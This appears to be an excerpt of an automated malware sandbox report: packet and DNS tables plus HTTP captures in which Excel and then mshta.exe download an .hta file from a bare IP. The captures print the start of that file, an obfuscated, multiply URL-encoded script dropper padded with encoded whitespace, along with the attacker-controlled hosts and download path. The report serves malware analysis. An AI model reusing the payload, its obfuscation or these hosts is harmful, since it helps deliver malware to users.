Oct 25, 2024 19:52:26.672635078 CEST	49204	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:26.817382097 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:26.822873116 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:26.822938919 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:26.825233936 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:26.830789089 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:26.830845118 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:26.836292982 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:27.798177958 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:27.802866936 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:27.808891058 CEST	80	49205	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:27.808971882 CEST	49205	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:27.946774960 CEST	49206	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:27.952367067 CEST	80	49206	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:27.952433109 CEST	49206	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:27.954771996 CEST	49206	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:27.960144997 CEST	80	49206	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:27.960200071 CEST	49206	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:27.965538025 CEST	80	49206	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:28.944343090 CEST	80	49206	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:28.944598913 CEST	49206	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:28.951443911 CEST	80	49206	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:28.951517105 CEST	49206	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:29.076658010 CEST	49207	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:29.082257032 CEST	80	49207	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:29.082334042 CEST	49207	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:29.084017992 CEST	49207	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:29.089411020 CEST	80	49207	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:29.089464903 CEST	49207	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:29.094902992 CEST	80	49207	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:30.087476015 CEST	80	49207	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:30.087565899 CEST	49207	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:30.093255043 CEST	80	49207	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:30.093343973 CEST	49207	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:30.226310015 CEST	49208	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:30.231952906 CEST	80	49208	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:30.232069016 CEST	49208	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:30.233679056 CEST	49208	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:30.239028931 CEST	80	49208	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:30.239135981 CEST	49208	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:30.244529963 CEST	80	49208	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:31.199507952 CEST	80	49208	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:31.199980021 CEST	49208	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:31.205724001 CEST	80	49208	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:31.205822945 CEST	49208	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:31.336209059 CEST	49209	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:31.341694117 CEST	80	49209	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:31.341759920 CEST	49209	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:31.343420982 CEST	49209	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:31.348896027 CEST	80	49209	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:31.348968029 CEST	49209	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:31.354439974 CEST	80	49209	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:32.292700052 CEST	80	49209	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:32.292783976 CEST	49209	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:32.298660040 CEST	80	49209	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:32.298746109 CEST	49209	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:32.426906109 CEST	49210	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:32.432423115 CEST	80	49210	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:32.432638884 CEST	49210	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:32.434194088 CEST	49210	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:32.440407991 CEST	80	49210	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:32.440484047 CEST	49210	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:32.445787907 CEST	80	49210	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:33.403844118 CEST	80	49210	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:33.404036999 CEST	49210	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:33.410305023 CEST	80	49210	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:33.410445929 CEST	49210	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:33.537256956 CEST	49211	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:33.542845011 CEST	80	49211	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:33.542954922 CEST	49211	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:33.544646025 CEST	49211	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:33.550153971 CEST	80	49211	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:33.550208092 CEST	49211	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:33.555716991 CEST	80	49211	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:34.518452883 CEST	80	49211	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:34.518596888 CEST	49211	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:34.524336100 CEST	80	49211	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:34.524435997 CEST	49211	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:34.664452076 CEST	49212	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:34.671149969 CEST	80	49212	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:34.671222925 CEST	49212	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:34.673525095 CEST	49212	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:34.679011106 CEST	80	49212	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:34.679063082 CEST	49212	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:34.684714079 CEST	80	49212	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:35.658840895 CEST	80	49212	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:35.658929110 CEST	49212	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:35.664690018 CEST	80	49212	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:35.664750099 CEST	49212	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:36.572334051 CEST	49213	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:36.577811003 CEST	80	49213	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:36.577873945 CEST	49213	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:36.579443932 CEST	49213	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:36.585088015 CEST	80	49213	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:36.585141897 CEST	49213	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:36.590554953 CEST	80	49213	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:37.677767038 CEST	80	49213	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:37.678244114 CEST	49213	80	192.168.2.22	94.156.177.220
Oct 25, 2024 19:52:37.684228897 CEST	80	49213	94.156.177.220	192.168.2.22
Oct 25, 2024 19:52:37.684364080 CEST	49213	80	192.168.2.22	94.156.177.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 19:50:44.185312033 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 25, 2024 19:50:44.193473101 CEST	53	54562	8.8.8.8	192.168.2.22
Oct 25, 2024 19:50:47.202464104 CEST	52917	53	192.168.2.22	8.8.8.8
Oct 25, 2024 19:50:47.213831902 CEST	53	52917	8.8.8.8	192.168.2.22
Oct 25, 2024 19:50:47.214359999 CEST	52917	53	192.168.2.22	8.8.8.8
Oct 25, 2024 19:50:47.222008944 CEST	53	52917	8.8.8.8	192.168.2.22
Oct 25, 2024 19:51:07.097786903 CEST	62751	53	192.168.2.22	8.8.8.8
Oct 25, 2024 19:51:07.130610943 CEST	53	62751	8.8.8.8	192.168.2.22
Oct 25, 2024 19:51:26.427962065 CEST	57893	53	192.168.2.22	8.8.8.8
Oct 25, 2024 19:51:26.437589884 CEST	53	57893	8.8.8.8	192.168.2.22
Oct 25, 2024 19:51:27.900490999 CEST	54821	53	192.168.2.22	8.8.8.8
Oct 25, 2024 19:51:27.917004108 CEST	53	54821	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 25, 2024 19:50:44.185312033 CEST	192.168.2.22	8.8.8.8	0xdcc7	Standard query (0)	qrisni.me	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:50:47.202464104 CEST	192.168.2.22	8.8.8.8	0x79e4	Standard query (0)	qrisni.me	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:50:47.214359999 CEST	192.168.2.22	8.8.8.8	0x79e4	Standard query (0)	qrisni.me	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:51:07.097786903 CEST	192.168.2.22	8.8.8.8	0xf3ba	Standard query (0)	qrisni.me	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:51:26.427962065 CEST	192.168.2.22	8.8.8.8	0x6927	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:51:27.900490999 CEST	192.168.2.22	8.8.8.8	0x20a7	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 25, 2024 19:50:44.193473101 CEST	8.8.8.8	192.168.2.22	0xdcc7	No error (0)	qrisni.me	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:50:44.193473101 CEST	8.8.8.8	192.168.2.22	0xdcc7	No error (0)	qrisni.me	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:50:47.213831902 CEST	8.8.8.8	192.168.2.22	0x79e4	No error (0)	qrisni.me	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:50:47.213831902 CEST	8.8.8.8	192.168.2.22	0x79e4	No error (0)	qrisni.me	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:50:47.222008944 CEST	8.8.8.8	192.168.2.22	0x79e4	No error (0)	qrisni.me	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:50:47.222008944 CEST	8.8.8.8	192.168.2.22	0x79e4	No error (0)	qrisni.me	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:51:07.130610943 CEST	8.8.8.8	192.168.2.22	0xf3ba	No error (0)	qrisni.me	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:51:07.130610943 CEST	8.8.8.8	192.168.2.22	0xf3ba	No error (0)	qrisni.me	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:51:26.437589884 CEST	8.8.8.8	192.168.2.22	0x6927	No error (0)	drive.google.com	142.250.186.46	A (IP address)	IN (0x0001)	false
Oct 25, 2024 19:51:27.917004108 CEST	8.8.8.8	192.168.2.22	0x20a7	No error (0)	drive.usercontent.google.com	142.250.186.161	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

qrisni.me

drive.google.com

drive.usercontent.google.com

192.3.176.141

94.156.177.220

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	192.3.176.141	80	3556	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:50:45.811971903 CEST	374	OUT	GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.141 Connection: Keep-Alive
Oct 25, 2024 19:50:46.487555981 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 17:50:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 25 Oct 2024 04:20:14 GMT ETag: "33147-625456f86fad3" Accept-Ranges: bytes Content-Length: 209223 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 33 45 6d 25 32 35 32 35 33 44 25 32 35 32 35 32 37 25 32 35 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 32 35 33 45 6d 25 32 35 32 35 32 35 33 44 25 32 35 32 35 32 35 32 37 25 32 35 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 32 35 [TRUNCATED] Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253Cscript%25252520language%2525253DJavaScript%2525253Em%2525253D%25252527%252525253C%2525252521DOCTYPE%2525252520html%252525253E%252525250A%252525253Cmeta%2525252520http-equiv%252525253D%2525252522X-UA-Compatible%2525252522%2525252520content%252525253D%2525252522IE%252525253DEmulateIE8%2525252522%2525252520%252525253E%252525250A%252525253Chtml%252525253E%252525250A%252525253Cbody%252525253E%252525250A%252525253CSCript%2525252520TYpe%252525253D%2525252522tExt/VbscRiPt%2525252522%252525253E%252525250ADiM%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252525252
Oct 25, 2024 19:50:46.487637997 CEST	1236	IN	Data Raw: 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 Data Ascii: 0%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520
Oct 25, 2024 19:50:46.487667084 CEST	1236	IN	Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 Data Ascii: 25252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252
Oct 25, 2024 19:50:46.487766981 CEST	1236	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 Data Ascii: 2520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252
Oct 25, 2024 19:50:46.487777948 CEST	848	IN	Data Raw: 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 Data Ascii: 525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25
Oct 25, 2024 19:50:46.487890005 CEST	1236	IN	Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 Data Ascii: 25252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252
Oct 25, 2024 19:50:46.487935066 CEST	1236	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 Data Ascii: 2520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252
Oct 25, 2024 19:50:46.487946033 CEST	1236	IN	Data Raw: 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 Data Ascii: %2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%
Oct 25, 2024 19:50:46.487993956 CEST	1236	IN	Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 Data Ascii: 5252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525
Oct 25, 2024 19:50:46.487999916 CEST	1236	IN	Data Raw: 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 Data Ascii: 520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25252525
Oct 25, 2024 19:50:46.493204117 CEST	1236	IN	Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 Data Ascii: 25252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49166	192.3.176.141	80	3848	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:50:48.404042959 CEST	451	OUT	GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1 Accept: / Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8896- Connection: Keep-Alive Host: 192.3.176.141 If-Range: "33147-625456f86fad3"
Oct 25, 2024 19:50:49.146286011 CEST	1236	IN	HTTP/1.1 206 Partial Content Date: Fri, 25 Oct 2024 17:50:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Fri, 25 Oct 2024 04:20:14 GMT ETag: "33147-625456f86fad3" Accept-Ranges: bytes Content-Length: 200327 Content-Range: bytes 8896-209222/209223 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 [TRUNCATED] Data Ascii: 52520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252525252
Oct 25, 2024 19:50:49.146310091 CEST	212	IN	Data Raw: 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 Data Ascii: 0%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2
Oct 25, 2024 19:50:49.146334887 CEST	1236	IN	Data Raw: 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 Data Ascii: 525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25
Oct 25, 2024 19:50:49.146351099 CEST	1236	IN	Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 73 41 74 62 4e 66 78 76 57 51 52 Data Ascii: 52520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520sAtbNfxvWQRakqNihpAgcGPJmNBsXCzKtfJVPbDCmTPNhSdzvOpiLmWtYgJfcosZUwbUNxuLJOyCngwUKwOtedJvSoLxDWIjXuKhiONDovjAdBHbcjlWJASzWhWDdWlWEUZPCwvOeKkQgyyDyWVaZYknlEDFdJNUQTidxPiZgCPF
Oct 25, 2024 19:50:49.146364927 CEST	1236	IN	Data Raw: 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 Data Ascii: 2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2
Oct 25, 2024 19:50:49.146378994 CEST	1236	IN	Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 Data Ascii: 252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25252
